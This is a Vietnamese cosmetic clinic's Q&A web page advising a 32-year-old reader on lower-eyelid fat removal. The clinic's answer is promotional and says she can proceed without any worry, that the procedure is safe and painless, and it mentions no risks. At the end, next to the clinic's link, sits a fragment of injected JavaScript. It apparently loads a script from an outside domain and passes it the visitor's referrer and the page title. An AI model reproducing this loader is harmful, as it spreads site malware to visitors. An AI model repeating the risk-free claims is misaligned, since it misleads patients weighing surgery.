Home » Tư vấn » Có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ?

Có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ?

Chào bác sĩ. Tôi tên Huyên, 32 tuổi. Do tuổi tác nên hiện nay đôi mắt của tôi có ở mí dưới có một lớp mỡ thừa khá dày. Điều này khiến tôi cảm giác nặng nề, khó chịu. Hiện tôi đang có ý định đi thẩm mỹ để giải quyết tình trạng này nhưng vẫn còn rất băn khoăn. Mong bác sĩ tư vấn giúp trường hợp của tôi có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ? Xin cám ơn.

Trả lời:

Chào Huyên,

Trước tiên xin cám ơn bạn đã quan tâm và gửi câu hỏi về cho chuyên mục tư vấn của Thẩm mỹ Xuân Trường. Với băn khoăn của bạn chúng tôi xin được gợi ý giúp bạn như sau:

Khi bước qua tuổi 30, da của chúng ta sẽ có dấu hiệu lão hóa đó là điều khó tránh khỏi. Đặc biệt, vùng mắt là nơi có biểu hiện của sự lão hóa sớm nhất. Dấu hiệu là hiện tượng xuất hiện nhiều da chùng và bọng mỡ nơi mí mắt dưới. Điều này không những ảnh hưởng đến thẩm mỹ mà còn đến tầm nhìn. Vì thế để giải quyết tình hình, mọi người đã tìm đến phương pháp thẩm mỹ.

Những trường hợp có thể lấy mỡ mí mắt dưới theo lời khuyên của chuyên gia.

–         Áp dụng cho những người trên 30 tuổi.

–         Những trường hợp có bọng mỡ mí dưới nhưng không có da nhăn nói mí dưới (với những người có da chùng nhiều, và bọng mỡ nên thực hiện cắt mí mắt dưới).

–         Những người còn trẻ nhưng có bọng mỡ mí dưới sớm cũng có thể thực hiện.

Có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ?

Lấy mỡ mí mắt dưới giúp đôi măt tươi trẻ, đầy sức sống

Với câu hỏi có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ? Trong trường hợp của bạn, chúng tôi xin được trả lời rằng bạn có thể hoàn toàn thực hiện được mà không phải lo lắng điều gì.

Để bạn hiểu rõ và yên tâm hơn trước khi quyết định thực hiện phương pháp thẩm mỹ lấy mỡ mí mắt dưới chúng tôi sẽ tư vấn thêm một số chi tiết sau:

Ưu điểm của phương pháp lấy mỡ mí mắt dưới:

–         Mắt đẹp tự nhiên, tươi trẻ và không còn bọng mỡ

–         Đảm bảo an toàn, không đau đớn, hạn chế để lại sẹo

–         Cho kết quả thẩm mỹ lâu dài, không ảnh hưởng đến thị giác.

Những lưu ý sau khi lấy mỡ mí mắt dưới:

–         Sau phẫu thuật bạn sẽ được về nhà ngay

–         Không dụi mắt trong 2-3 ngày đầu sau phẫu thuật

–         Uống thuốc theo đơn bác sĩ

–         Hạn chế ngồi ti vi, máy tính nhiều để tránh nheo mắt

 Có nên thực hiện tiểu phẫu lấy mỡ mí mắt dưới không ?

Hình ảnh trước và sau lấy mỡ mí mắt dưới

Hiện nay, phương pháp thẩm mỹ lấy mỡ mí mắt dưới đã và đang được áp dụng rất thành công tại Thẩm mỹ Xuân Trường, nhận được sự hài lòng cũng như đánh giá cao của nhiều chuyên gia, khách hàng từng đến đây.

Để biết rõ hơn và giúp bạn có thể giải quyết tình trạng của mình triệt để bạn có thể dành thời gian đến Xuân Trường để được gặp bác sĩ chuyên khoa mắt tư vấn hoặc tham khảo thêm tại đây: http://thammymat.com/tham-my-mat/lay-mo-mi-mat-duoi.htmls.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Trọng Điều

Hỏi đáp

Email của Quý khách sẽ không được công bố *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Copy Protected by Chetan's WP-Copyprotect.